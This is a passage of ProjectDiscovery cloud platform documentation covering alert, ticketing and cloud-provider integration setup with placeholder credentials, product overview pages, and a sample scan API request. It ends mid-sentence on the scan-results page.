Technical guide for configuring third-party integrations for cloud assets, vulnerability scanning, alerts, and ticketing
## Summary
ProjectDiscovery supports various third-party integrations to enhance your security workflow. These integrations enable:
* Cloud asset discovery and management
* Real-time alerting through communication platforms
* Automated vulnerability tracking through ticketing systems
* Custom webhook integrations for workflow automation
Configure your integrations through the [Configurations](https://cloud.projectdiscovery.io/configs) interface.
## Notification Integrations
Alerting integrations support notifications as part of scanning and include Slack, Microsoft Teams, Email, and custom Webhooks. Navigate to [Scans → Configurations → Alerting](https://cloud.projectdiscovery.io/scans/configs) to configure your alerts.
### Slack
ProjectDiscovery supports scan notifications through Slack. To enable Slack notifications provide a name for your Configuration, a webhook, and an optional username.
Choose from the list of **Events** (Scan Started, Scan Finished, Scan Failed) to specify what notifications are generated. All Events are selected by default
* Refer to Slack's [documentation on creating webhooks](https://api.slack.com/messaging/webhooks) for configuration details.
### MS Teams
ProjectDiscovery supports notifications through Microsoft Teams. To enable notifications, provide a name for your Configuration and a corresponding webhook.
Choose from the list of **Events** (Scan Started, Scan Finished, Scan Failed) to specify what notifications are generated.
* Refer to [Microsoft's documentation on creating webhooks](https://learn.microsoft.com/en-us/microsoftteams/platform/webhooks-and-connectors/how-to/add-incoming-webhook?tabs=newteams%2Cdotnet) for configuration details.
### Email
ProjectDiscovery supports notifications via Email. To enable email notifications for completed scans simply add your recipient email addresses.
### Webhook
ProjectDiscovery supports custom webhook notifications, allowing you to post events to any HTTP endpoint that matches your infrastructure requirements.
To implement webhook notifications, provide:
* Configuration name
* Webhook URL
* Authentication parameters (if required)
Example endpoint format:
```
https://your-domain.com/api/security/alerts
```
## Ticketing Integrations
The integrations under Ticketing support ticketing functionality as part of scanning and include support for Jira, GitHub, GitLab, and Linear. Navigate to [Scans → Configurations → Ticketing](https://cloud.projectdiscovery.io/scans/configs?type=reporting) to configure your ticketing tools.
### Jira
ProjectDiscovery provides integration support for Jira to create new tickets when vulnerabilities are found.
Provide a name for the configuration, the Jira instance URL , the Account ID, the Email, and the associated API token.
Details on creating an API token are available [in the Jira documentation here.](https://support.atlassian.com/atlassian-account/docs/manage-api-tokens-for-your-atlassian-account/)
### GitHub
ProjectDiscovery provides integration support for GitHub to create new tickets when vulnerabilities are found.
Provide a name for the configuration, the Organization or username, Project name, Issue Assignee, Token, and Issue Label. The Issue Label determines when a ticket is created. (For example, if critical severity is selected, any issues with a critical severity will create a ticket.)
* The severity as label option adds a template result severity to any GitHub issues created.
* Deduplicate posts any new results as comments on existing issues instead of creating new issues for the same result.
Details on setting up access in GitHub [are available here.](https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/managing-your-personal-access-tokens)
### GitLab
ProjectDiscovery provides integration support for GitLab to create new tickets when vulnerabilities are found.
Provide your GitLab username, Project name, Project Access Token and a GitLab Issue label. The Issue Label determines when a ticket is created.
(For example, if critical severity is selected, any issues with a critical severity will create a ticket.)
* The severity as label option adds a template result severity to any GitLab issues created.
* Deduplicate posts any new results as comments on existing issues instead of creating new issues for the same result.
Refer to GitLab's documentation for details on [configuring a Project Access token.](https://docs.gitlab.com/ee/user/project/settings/project_access_tokens.html#create-a-project-access-token)
### Linear
ProjectDiscovery integrates with Linear for automated issue tracking. The integration requires the following API parameters:
1. Linear API Key
2. Linear Team ID
3. Linear Open State ID
To retrieve these parameters:
1. **API Key Generation**:
* Path: Linear > Settings > API > Personal API keys
* Direct URL: linear.app/\[workspace]/settings/api
2. **Team ID Retrieval**:
```graphql
query {
teams {
nodes {
id
name
}
}
}
```
1. **Open State ID Retrieval**:
```graphql
query {
workflowStates {
nodes {
id
name
}
}
}
```
For detailed API documentation, refer to the [Linear API Documentation](https://developers.linear.app/docs/graphql/working-with-the-graphql-api).
## Cloud Asset Discovery
ProjectDiscovery leverages our open-source [Cloudlist](https://github.com/projectdiscovery/cloudlist) technology to provide comprehensive cloud asset discovery and management through a simple web interface.
### Major Cloud Services
#### AWS (Amazon Web Services)
Supported AWS Services:
* [EC2](https://aws.amazon.com/ec2/)
* [Route53](https://aws.amazon.com/route53/)
* [S3](https://aws.amazon.com/s3/)
* [Cloudfront](https://aws.amazon.com/cloudfront/)
* [ECS](https://aws.amazon.com/ecs/)
* [EKS](https://aws.amazon.com/eks/)
* [ELB](https://aws.amazon.com/elasticloadbalancing/)
* [ELBv2](https://aws.amazon.com/elasticloadbalancing/)
* [Lambda](https://aws.amazon.com/lambda/)
* [Lightsail](https://aws.amazon.com/lightsail/)
* [Apigateway](https://aws.amazon.com/api-gateway/)
**Example Config**:
Amazon Web Services can be integrated by using the following configuration block.
```yaml
- provider: aws # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# aws_access_key is the access key for AWS account
aws_access_key: $AWS_ACCESS_KEY
# aws_secret_key is the secret key for AWS account
aws_secret_key: $AWS_SECRET_KEY
# aws_session_token session token for temporary security credentials retrieved via STS (optional)
aws_session_token: $AWS_SESSION_TOKEN
# assume_role_name is the name of the role to assume (optional)
assume_role_name: $AWS_ASSUME_ROLE_NAME
# account_ids is the aws account ids which has similar assumed role name (optional)
account_ids:
- $AWS_ACCOUNT_ID_1
- $AWS_ACCOUNT_ID_2
```
`aws_access_key` and `aws_secret_key` can be generated in the IAM console. We recommend creating a new IAM user with `Read Only` permissions and providing the access token for the user.
Scopes Required:
The following scopes can directly be provided to the IAM user.
```
EC2 - AmazonEC2ReadOnlyAccess
Route53 - AmazonRoute53ReadOnlyAccess
S3 - AmazonS3ReadOnlyAccess
Lambda - AWSLambda_ReadOnlyAccess
ELB - ElasticLoadBalancingReadOnly
Cloudfront - CloudFrontReadOnlyAccess
```
To also support other services, a custom policy document is provided which can directly be copy-pasted to the role to allow correct and minimal permissions.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "RequiredReadPermissions",
"Effect": "Allow",
"Action": [
"ec2:DescribeInstances",
"ec2:DescribeRegions",
"route53:ListHostedZones",
"route53:ListResourceRecordSets",
"s3:ListAllMyBuckets",
"lambda:ListFunctions",
"elasticloadbalancing:DescribeLoadBalancers",
"elasticloadbalancing:DescribeTargetGroups",
"elasticloadbalancing:DescribeTargetHealth",
"cloudfront:ListDistributions",
"ecs:ListClusters",
"ecs:ListServices",
"ecs:ListTasks",
"ecs:DescribeTasks",
"ecs:DescribeContainerInstances",
"eks:ListClusters",
"eks:DescribeCluster",
"apigateway:GET",
"lightsail:GetInstances",
"lightsail:GetRegions"
],
"Resource": "*"
}
]
}
```
**References:**
1. [https://docs.aws.amazon.com/IAM/latest/UserGuide/reference\_policies\_examples\_iam\_read-only-console.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_iam_read-only-console.html)
2. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_access-keys.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html)
3. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_temp\_request.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html)
* Aws Assume Role:
* [https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html](https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html)
* [https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role](https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role)
#### Google Cloud Platform (GCP)
Supported GCP Services:
* [Cloud DNS](https://cloud.google.com/dns)
* [Kubernetes Engine](https://cloud.google.com/kubernetes-engine)
* [Compute Engine](https://cloud.google.com/products/compute)
* [Bucket](https://cloud.google.com/storage)
* [Cloud Functions](https://cloud.google.com/functions)
* [Cloud Run](https://cloud.google.com/run)
**Example Config:**
Google Cloud Platform can be integrated by using the following configuration block.
```yaml
- provider: gcp # provider is the name of the provider
# profile is the name of the provider profile
id: logs
# gcp_service_account_key is the minified json of a google cloud service account with list permissions
gcp_service_account_key: '{xxxxxxxxxxxxx}'
```
`gcp_service_account_key` can be retrieved by creating a new service account. To do so, create service account with Read Only access to `cloudresourcemanager` and `dns` scopes in IAM. Next, generate a new account key for the Service Account by following steps in Reference 2. This should give you a json which can be pasted in a single line in the `gcp_service_account_key`.
Scopes Required: Cloud DNS, GKE
References:
1. [https://cloud.google.com/iam/docs/service-account-overview](https://cloud.google.com/iam/docs/service-account-overview)
#### Azure
Supported Azure Services:
* Virtual Machines
**Example Config:**
Microsoft Azure can be integrated by using the following configuration block.
```yaml
- provider: azure # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# client_id is the client ID of registered application of the azure account (not requuired if using cli auth)
client_id: $AZURE_CLIENT_ID
# client_secret is the secret ID of registered application of the zure account (not requuired if using cli uth)
client_secret: $AZURE_CLIENT_SECRET
# tenant_id is the tenant ID of registered application of the azure account (not requuired if using cli auth)
tenant_id: $AZURE_TENANT_ID
#subscription_id is the azure subscription id
subscription_id: $AZURE_SUBSCRIPTION_ID
#use_cli_auth if set to true cloudlist will use azure cli auth
use_cli_auth: true
```
`tenant_id`, `client_id`, `client_secret` can be obtained/generated from `All services` > `Azure Active Directory` > `App registrations`
`subscription_id` can be retrieved from `All services` > `Subscriptions`
To use cli auth set `use_cli_auth` value to `true` and run `az login` in the terminal
References:
1. [https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli](https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli)
2. [https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az\_ad\_sp\_create\_for\_rbac](https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az_ad_sp_create_for_rbac)
3. [https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli](https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli)
#### Alibaba Cloud
Suppoted Alibaba Cloud Services:
* ECS Instances
**Example Config:**
Alibaba Cloud can be integrated by using the following configuration block.
```yaml
- provider: alibaba # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# alibaba_region_id is the region id of the resources
alibaba_region_id: $ALIBABA_REGION_ID
# alibaba_access_key is the access key ID for alibaba cloud account
alibaba_access_key: $ALIBABA_ACCESS_KEY
# alibaba_access_key_secret is the secret access key for alibaba cloud account
alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET
```
Alibaba Cloud Access Key ID and Secret can be created by visiting [https://ram.console.aliyun.com/manage/ak](https://ram.console.aliyun.com/manage/ak)
References:
1. [https://www.alibabacloud.com/help/faq-detail/142101.htm](https://www.alibabacloud.com/help/faq-detail/142101.htm)
2. [https://www.alibabacloud.com/help/doc-detail/53045.htm](https://www.alibabacloud.com/help/doc-detail/53045.htm)
## Infrastructure & Platform Services
#### Kubernetes
Support for:
* Services
* Ingresses
* Cross-cloud cluster discovery
Navigate to [Assets → Connect Cloud Services → Kubernetes](https://cloud.projectdiscovery.io/assets/configure) to configure your cluster access.
#### Hashicorp Stack
Support for:
* Terraform state file parsing
* Nomad services
* Consul services
### CDN & DNS Providers
Configure these providers through [Assets → Connect Cloud Services](https://cloud.projectdiscovery.io/assets/configure):
* **Cloudflare**: DNS and CDN assets
* **Fastly**: CDN endpoints
* **Namecheap**: Domain management
### VPS & PaaS Providers
Access these providers through [Assets → Connect Cloud Services](https://cloud.projectdiscovery.io/assets/configure):
* **DigitalOcean**: Droplets and managed services
* **Scaleway**: Instances and managed services
* **Heroku**: Applications and add-ons
* **Linode**: Compute instances
* **Hetzner Cloud**: Cloud servers
# Introducing ProjectDiscovery
Source: https://docs.projectdiscovery.io/cloud/introduction
Sign up for our [cloud platform](https://cloud.projectdiscovery.io/) for free.
Have a complex company use case? Get [Enterprise grade assistance](https://projectdiscovery.io/request-demo)
ProjectDiscovery is a continuous security monitoring platform that helps teams proactively find and fix critical exposures in their external infrastructure. It blends professional-grade vulnerability management with an easy-to-use, open-source powered approach. Below is an overview of its key capabilities:
Continuous Asset Monitoring
* Continuously monitors all internet-exposed assets and services in your infrastructure, automatically discovering new hosts, endpoints, and changes in your attack surface
* Ensures you have up-to-date visibility into what's publicly accessible at any given time
Open-Source Integrations
* Leverages a suite of battle-tested open-source security tools (e.g. Nuclei, httpx, dnsx) to scan your environment at scale
* By integrating these community-driven tools, ProjectDiscovery helps uncover unknown exposures and misconfigurations that traditional scanners might miss, keeping your team one step ahead of threats
Realistic Attack Simulation
* Identifies and validates vulnerabilities with high accuracy by safely simulating real-world attack methods in a controlled environment
* Every finding is verified with a proof-of-concept exploit, drastically reducing false positives compared to basic version-based scanners
* In practice, this means you only get alerts for issues that are truly exploitable, saving time on triage
Customizable Detection Rules
* Provides a flexible, YAML-based framework that lets you define your own vulnerability detection rules and workflows
* Teams can codify insights from penetration tests or bug bounty reports into custom scan templates, automating the detection of those specific scenarios across their systems
* This customization empowers organizations to adapt the platform to their unique environment and security knowledge
Community-Powered Updates
* Stays in sync with the latest threats via a real-time community feed of new vulnerability templates and attack techniques
* ProjectDiscovery's global user community continuously contributes and updates these detection templates (for trending exploits, emerging CVEs, etc.)
* Ensures you're quickly alerted to new attack vectors as soon as they arise
Attacker's Perspective
* Unlike traditional vulnerability scanners that rely solely on known CVE databases and version checks, ProjectDiscovery approaches security from an attacker's point of view
* Zeroes in on vulnerabilities that are actually exploitable in real-world conditions – the weaknesses attackers would target
* Helps your team prioritize fixing the issues that matter most
Each of these capabilities works together to give security teams and developers an accurate, noise-free view of their true security risks. By focusing on what attackers can really exploit (rather than just matching CVEs), ProjectDiscovery helps organizations address the most critical vulnerabilities first, with confidence and speed.
## Getting Started
Ready to secure your infrastructure? Here's how to begin:
* [Create a free account](https://cloud.projectdiscovery.io)
* [Explore our documentation](/cloud/assets/overview)
* [Join our Discord community](https://discord.com/invite/projectdiscovery)
# From Open Source to Cloud Platform
Source: https://docs.projectdiscovery.io/cloud/ossvscloud
ProjectDiscovery's journey from open source to a cloud platform is grounded in a commitment to community-driven security and enhanced organizational capabilities. **ProjectDiscovery began as an open-source toolkit**, embraced by over 100,000 security professionals worldwide. These tools thrive on community-driven innovation – for example, users contribute new vulnerability templates to quickly detect emerging threats. We also offer advanced customization, like the ability to write custom scan templates and integrate with scripts, giving security engineers flexibility in how they hunt for issues. However, as usage grows within a company, teams often encounter challenges with **scale, consistency, and maintenance** that individual open-source tools alone may not easily solve. The **ProjectDiscovery Cloud Platform** was built to address these challenges by transforming our battle-tested open-source tools into a comprehensive, managed solution. It retains the transparency and flexibility that the community loves, while streamlining workflows, increasing speed, and adding enterprise-grade features to meet the needs of security and engineering teams at scale. Below, we outline the key benefits and features that the cloud platform brings, and how it complements our open-source tools.
## Cloud Platform Benefits
Moving to the cloud platform **streamlines security workflows** and offloads the operational burden from your team. Instead of running scans on local infrastructure and managing updates manually, you can leverage a high-performance cloud environment purpose-built for security scanning. Key benefits include:
* **No Infrastructure to Manage:** The cloud platform eliminates the need to deploy, configure, and maintain your own scanning servers or VMs. All scanning infrastructure is hosted and managed by ProjectDiscovery, meaning no installation headaches or ongoing server upkeep on your side (zero maintenance overhead). This frees your team to focus on findings and fixes rather than ops tasks.
* **Blazing-Fast, Scalable Scanning:** ProjectDiscovery's cloud orchestrates scans across a distributed network of machines, enabling massively parallel execution. This design delivers vulnerability scanning up to **50× faster than typical self-hosted deployments**. Large asset inventories that might take hours or days to scan with local tools can be covered in minutes on the cloud. High throughput scanning becomes the norm, allowing you to continuously assess thousands of assets without waiting.
* **Centralized Results (Single Source of Truth):** All scan findings and asset data are consolidated in one cloud-based dashboard. By maintaining a **single source of truth for all security discoveries across your organization**, the platform makes it easy to track issues from discovery to resolution. Teams no longer deal with scattered scan outputs or multiple databases – everything is in one place, searchable and correlated, which simplifies analysis and reporting.
* **Always Up-to-Date Checks:** The cloud platform stays in sync with the latest threat intelligence. Vulnerability signatures and detection templates are updated in real-time by ProjectDiscovery's research team and the global community. The moment a new CVE or exploit technique emerges, a template can be added and instantly made available for your scans. Your security tests are always using the most current knowledge base without you manually pulling updates from GitHub or managing template files.
* **Fixed Scan IPs for Easy Whitelisting:** All cloud-initiated scans originate from a fixed set of IP addresses provided by ProjectDiscovery. This makes it simple to whitelist the scanner in your target environments' firewalls and IPS. Unlike running scans from ever-changing IPs or developer machines, you know exactly what source addresses our cloud will use. You can define custom rate limits or access rules for these scanners, ensuring high-speed scans don't trigger defensive blocks. This **predictable IP range** is especially useful when scanning internal assets or third-party services that require pre-approval of scanner IPs.
## Enterprise-Grade Features
Beyond raw speed and convenience, the ProjectDiscovery Cloud Platform includes **enterprise-grade features** that help manage security efforts across large teams and complex environments. It's designed to provide the visibility, control, and integrations that organizations need for a mature security program:
* **Centralized Security Visibility:** The platform provides a unified dashboard that displays all vulnerabilities and assets discovered across your organization in real time. This **central visibility** means security leads and engineers share the same up-to-date view of the attack surface and can prioritize issues together. Instead of siloed scan reports, everyone sees findings in one place – improving situational awareness and facilitating data-driven decisions. Graphs, search filters, and trend views let you quickly assess your security posture or drill down into specific asset groups.
* **Team Collaboration and Workspaces:** ProjectDiscovery Cloud is built for teams. You can organize assets and scans into shared workspaces so multiple team members can contribute without stepping on each other's toes. The platform enables collaborative workflows – for example, one team member can configure a scan, another can review the results, and a third can validate a finding – all within the same interface. By **uniting security teams through shared workspaces and collaborative processes**, the cloud platform ensures everyone stays in sync. Findings can be commented on and tagged, facilitating knowledge sharing across AppSec, DevOps, and engineering groups.
* **Granular Access Control (RBAC):** With role-based access control, you can tightly manage who on your team can view data or perform certain actions. The platform lets you define roles (e.g., admin, security engineer, read-only analyst) and assign permissions accordingly. For instance, you might allow an engineering team to see and fix vulnerabilities in their projects, while restricting administrative settings to the security team leads. This granular access control ensures sensitive information is only accessible to the right people and supports separation-of-duties practices. As a result, large organizations can onboard many users while maintaining governance over what each user or team can do.
* **Single Sign-On and Audit Logging:** ProjectDiscovery Cloud integrates with enterprise Single Sign-On (SSO) providers like Okta, Azure AD (Entra ID), and Google Workspace for streamlined and secure authentication. Your team can use existing corporate logins to access the platform, simplifying user management and enforcing company login policies (such as 2FA). Additionally, every action on the platform is tracked with comprehensive **audit logs**. You can review who ran a scan, who acknowledged a vulnerability, or who changed a setting, along with timestamps. These logs help meet compliance requirements and provide accountability, making it easier to pass security audits or investigate incidents.
* **Compliance Reporting:** Generating reports for executives or compliance frameworks is built into the platform. With a few clicks, you can produce reports tailored to standards like **SOC 2, PCI-DSS, HIPAA** and others. The reports compile relevant findings, trends, and metrics to demonstrate your security posture over time. This saves significant effort for security teams who typically would manually assemble data for auditors or management. The cloud platform ensures that the data in these reports is up-to-date and pulled from that single source of truth, reducing errors and omissions. Having on-demand executive and compliance reports readily available helps translate technical findings into business terms and proof of due diligence.
* **Automated Vulnerability Regression Testing:** When vulnerabilities are found and fixed, the work isn't over – you need to ensure those issues stay fixed. The cloud platform can automatically **re-scan and retest known vulnerabilities** on a schedule or upon deployment of a fix. This regression testing workflow means if a previously patched issue reappears (due to a code change, configuration drift, etc.), you'll catch it immediately. It creates a safety net that continuously validates your remediation efforts. Instead of relying on memory or tickets to revisit old findings, the platform's automation verifies them for you and alerts if something that was safe becomes vulnerable again. This feature gives teams confidence that improvements are lasting and helps prevent regressions from slipping through.
* **Dedicated Scanning IPs and Control:** (Enterprise Feature) As mentioned earlier, the cloud provides fixed scanning IP addresses. In an enterprise context, this is critical for complying with internal security policies. You can formally register or whitelist the ProjectDiscovery scanner IPs in advance, satisfying any approval processes before testing. Moreover, you can enforce custom rate limits or scanning hours to avoid network saturation in sensitive environments. Having **dedicated, known scanner IPs** and the ability to control their behavior makes the cloud platform play nicely within corporate network rules, unlike unmanaged open-source scans that might inadvertently trigger alarms.
* **Enterprise Support and Scale:** For organizations that need it, ProjectDiscovery offers enterprise support plans with dedicated assistance, SLAs, and onboarding help. The platform is also built to handle **enterprise scale** – from discovering assets across multiple cloud providers to mapping out subsidiaries and business units. You can monitor a large, dynamic attack surface without worrying about hitting tool limits. Whether you have 100 or 100,000 assets to assess, the cloud backend can scale to meet the demand, leveraging cloud resources to maintain performance. This ensures that as your organization (and asset inventory) grows, your security scanning can grow with it seamlessly.
## Open-Source Integration and Flexibility
Adopting the cloud platform doesn't mean abandoning the open-source tools your team knows and loves. In fact, the two work hand-in-hand. We recognize that **security teams value the flexibility of open-source**, from crafting custom detection logic to integrating tools into bespoke workflows. ProjectDiscovery Cloud is designed to complement and enhance your use of open-source tools, allowing you to continue leveraging them where it makes sense while benefiting from cloud capabilities. Here's how the platform integrates with open-source usage:
* **Use Existing CLI Tools with Cloud:** If you have existing scripts or pipelines built around ProjectDiscovery's CLI tools (such as Nuclei, Subfinder, httpx, etc.), you can plug them into the cloud via our API. The platform provides a robust API and SDKs that let you programmatically trigger cloud scans, fetch results, and manage assets. In practice, this means you can **connect your current automation with our cloud APIs** without a complete rewrite. For example, a CI/CD pipeline running daily scans can call the cloud to perform the scan and retrieve findings, blending into your established processes.
* **Custom Templates Across Environments:** One of the strengths of ProjectDiscovery tools is the ability to write custom vulnerability templates (e.g., Nuclei YAML templates) for your specific needs. The cloud platform fully supports this customization. You can upload and use your **custom templates on the cloud just as you do locally**. Templates you've developed in-house can be synced to the cloud scanner, ensuring that proprietary checks (for your app, environment, or policy requirements) run at scale. There's no lock-in to only built-in templates – you maintain the freedom to tailor scanning to your unique context, with the cloud handling the heavy lifting to run those checks on many targets.
* **Unified Data from Open-Source and Cloud Scans:** Whether a scan is run locally or in the cloud, you can bring the results together. The platform is able to **aggregate findings from both cloud and local scans into one unified view**. This means if certain sensitive scans must be done on-premises with open-source tools (for example, inside a restricted network), those results can be imported or correlated with your cloud findings. Your team gets a holistic picture of vulnerabilities without needing to manually merge reports. In short, the cloud platform becomes the central repository for all your ProjectDiscovery tool outputs, regardless of where they ran.
* **Flexible Deployment Strategies:** With the combination of open-source and cloud, you can adopt a hybrid scanning strategy. The cloud platform allows you to **choose where to run specific security checks** – some can run in the cloud for speed and scale, while others run locally for special cases. For instance, you might run external-facing asset scans on the cloud (to leverage its scale and fixed IPs), but execute internal network scans with the open-source tools on an on-prem machine that has the necessary network access. Both sets of results flow into the platform. This flexibility ensures you're not constrained by one approach; you use the best tool for the job, and ProjectDiscovery ties it all together. The open-source tools remain an integral part of your workflow, and the cloud platform enhances them with a centralized, automated touch.
## Performance and Scale
One of the most compelling reasons to use the cloud platform is the **dramatic boost in scanning performance and the ability to scale to very large environments** effortlessly. ProjectDiscovery Cloud's architecture and optimizations solve many limitations of self-hosted scanning:
* **Massively Parallel Scanning Engine:** Unlike running scanners on a single server (even a powerful one), the cloud platform can distribute workloads across many nodes. This massively parallel approach means you can scan dozens or hundreds of targets concurrently, each with hundreds of payloads or templates, without bogging down. The result is scans completing far faster than in a self-managed setup – up to *50 times faster than a typical Nuclei self-hosted deployment*. By scaling out horizontally, the cloud handles large-scale reconnaissance and vulnerability scanning in a fraction of the time, which is crucial when you need quick feedback or have tight assessment windows.
* **High Throughput with Reliability:** The cloud platform is tuned for high-throughput scanning – it can handle running tens of thousands of requests per second when needed, all while gracefully managing retries, timeouts, and failures. Because ProjectDiscovery operates the infrastructure, it is optimized to avoid common pain points like running out of memory or crashing under load. You don't have to guess at thread counts or worry about CPU spikes; the platform auto-scales and balances load to keep scans efficient from start to finish. This means you get both speed *and* stability, even for complex scanning tasks.
* **Real-Time Security Updates:** Speed is not just about how fast packets can be sent, but also how current your scanning knowledge is. The cloud platform benefits from **real-time vulnerability template updates** fed by our research team and community contributions. The instant a new vulnerability check is available, cloud scans can include it. This real-time update cycle ensures you can scan for the latest threats *immediately*. In contrast, in a self-hosted scenario you might update your tools weekly or ad-hoc, possibly missing critical windows. The platform essentially keeps you on the cutting edge of detection without any manual intervention.
* **Scaling to Your Entire Attack Surface:** Because it's built on cloud infrastructure, the platform can easily scale to cover your full environment, however large or distributed. Need to scan assets across multiple regions or cloud providers? The platform can do that in parallel. It supports **multi-cloud asset discovery and monitoring** to find and track assets in AWS, GCP, Azure, and more. This wide coverage is coupled with the ability to run scans from different geographical regions to minimize latency to targets, if needed. In practical terms, whether you have 50 websites or 50,000, or whether those are spread across on-prem data centers and cloud accounts, you can count on the platform to enumerate and assess them in a standardized way. You won't be constrained by the limits of a single machine or network – the cloud dynamically allocates resources to meet your scanning needs.
* **Faster Time to Remediation:** Ultimately, the performance gains and scalability translate into earlier detection of vulnerabilities. When scans that used to take days now finish in an hour, your team gets findings that much sooner. Faster discovery means you can start fixing issues sooner, reducing exposure. It also enables more frequent re-scans; instead of scanning critical assets monthly due to time constraints, perhaps you can scan them weekly or daily now. This agility in scanning cadence helps ensure that if a new risk appears, it's caught and addressed promptly, keeping your security posture much more current.
## Standardized Security Processes
Migrating to the ProjectDiscovery Cloud Platform not only improves raw capabilities, but also helps **standardize your security assessment processes**. For many organizations, one of the biggest challenges is ensuring everyone follows best practices and that security tasks are done consistently. The cloud platform is opinionated in the right ways – it provides structure that makes your operations more repeatable and efficient:
* **Consistent, Templated Workflows:** The platform allows you to define and use templated workflows for common tasks. For example, you might have a "Weekly External Scan" template that includes a specific set of scanners, templates, and notification settings. By using such predefined scans, every execution follows the same proven process. This **standardization of workflows** ensures that no matter who runs the scan, the coverage and methodology are uniform. It reduces the chance of human error (such as someone forgetting to include a critical test) and makes your scanning regimen systematic. Over time, this builds confidence that your security checks are thorough and consistent.
* **Organization-Wide Methodology:** When all teams use the cloud platform, you effectively establish a common security testing methodology across the organization. Application security, cloud security, and ops teams are no longer using completely different tools or techniques – they're all working within the same framework. This unified approach means findings from different parts of the organization are directly comparable and all follow the same risk scoring and format. If your company has multiple engineering teams, standardizing on the platform helps ensure each team's security practices are at the same high standard, which is hard to achieve when everyone uses disparate open-source setups.
* **Faster Onboarding and Training:** New engineers or security analysts can get up to speed quicker because they have a clear, centralized system to learn. Instead of teaching newcomers a grab-bag of scripts and command-line flags, you can train them on the ProjectDiscovery Cloud interface and workflow. The learning curve is lower, and they can start contributing sooner. The platform's dashboards and reports are also more accessible to non-security stakeholders compared to raw tool output, which means developers, product managers, or auditors can understand the security data without needing deep tool knowledge. This broader understanding further enforces the practice, as more people in the organization can engage with the security process in a standard way.
* **Improved Collaboration & Accountability:** With standardized processes comes better teamwork. Everyone knows how a finding should be documented, how a remediation should be validated, and how to mark an issue as resolved in the system. Features like shared workspaces, comments, and assignment of findings to owners mean the hand-off from detection to remediation is well-defined. Meanwhile, **audit logs on the platform record all these actions**, so you have a trail of who did what. This clarity greatly improves accountability – if a vulnerability was missed or left unpatched, you can trace back through the logs and workflow to see where the process might be improved. Over time, analyzing this data helps refine and strengthen your security operations playbook.
* **Security and Compliance Alignment:** A standardized platform naturally produces standardized outputs (dashboards, reports, metrics). This makes it much easier to align with security policies and compliance requirements. You can configure the platform to enforce certain checks or frequencies (for example, require that all critical apps are scanned monthly). Compliance frameworks often call for evidence of regular, consistent security activities – the platform can be that evidence, showing a schedule of scans and how issues are tracked to closure. By automating and standardizing those activities, you reduce the manual effort to prove compliance. In essence, the platform bakes best practices and policy adherence into the daily routine, so passing audits becomes a byproduct of doing the right thing consistently.
***
By moving **from open-source tools to the ProjectDiscovery Cloud Platform**, organizations can dramatically boost their security capabilities while still retaining the flexibility that made the open-source approach successful. The cloud platform offloads maintenance and accelerates scanning, provides a unified view of risk for the entire team, and introduces enterprise features that simplify management and reporting. At the same time, it respects the need for customization and integration by working hand-in-hand with open-source workflows. The result is a solution that empowers security and engineering teams to cover more ground in less time, with greater confidence and consistency. In an era of fast-evolving threats and expanding attack surfaces, the combination of community-powered tools and a scalable cloud platform helps ensure your security processes are both **agile and standardized** – enabling you to find and fix vulnerabilities before they can be exploited.
# External Vulnerability Scanning
Source: https://docs.projectdiscovery.io/cloud/scanning/external-scan
External vulnerability scanning is crucial for understanding your organization's security posture from an attacker's perspective. ProjectDiscovery's approach combines thorough asset discovery with precise vulnerability detection, focusing on exploitable issues rather than theoretical or low severity vulnerabilities.
Before starting external scans, ensure you have a complete inventory of your internet facing assets. Learn more about our [Asset Discovery and Management](/cloud/assets/overview) capabilities.
## Scanning Capabilities
ProjectDiscovery offers multiple scanning approaches, with automated scanning enabled by default and additional options for custom requirements:
Scans automatically initiate when:
* New assets are discovered
* New templates are released
* Infrastructure changes detected
* Create specific scan workflows
* Focus on selected assets
* Custom template selection
* Create compliance-focused scans
* Security baseline validation
* Custom compliance requirements
* Misconfigurations detection
Automatically revalidate findings to confirm fixes and prevent regression.
Connect with ticketing systems for streamlined vulnerability management.
Add custom headers and variables for specialized scanning requirements.
Enterprise: Configure custom scan rates to match your infrastructure capacity.
ProjectDiscovery offers tiered scanning capabilities: Pro users can perform ultra-fast cloud scans (50x faster) with support for up to 1,000 assets, while Enterprise users gain additional features like custom scan limits, custom rate limits, and fixed scan IPs for whitelisting. Free users are limited to internal vulnerability scans only - learn more about internal scanning [here](/cloud/scanning/nuclei-scan).
## Get Started with External Scanning
Launch your first external vulnerability scan
Customize scan parameters and templates
Connect with your security tools and workflows
## Automation & API Access
Besides the UI-based scanning, you can programmatically trigger scans using our REST API:
```bash
POST https://api.projectdiscovery.io/v1/scans
```
Required headers:
```http
X-API-Key: your-api-key
X-Team-Id: your-team-id # Find at cloud.projectdiscovery.io/settings/team
```
Example request body:
```json
{
"name": "External Scan",
"targets": ["example.com"],
"templates": ["cves", "vulnerabilities"],
"recommended": true,
"scan_config_ids": ["config-id"],
"alerting_config_ids": ["alert-id"],
"reporting_config_ids": ["report-id"]
}
```
For detailed API documentation and additional endpoints, refer to our [API Reference](https://docs.projectdiscovery.io/api-reference/scans/create-scan).
## Browsing Scan Results
Once your scans are complete, you can explore the results to gain insights into your security posture. The ProjectDiscovery Cloud Platform provides a comprehensive view of all scan results, allowing you to:
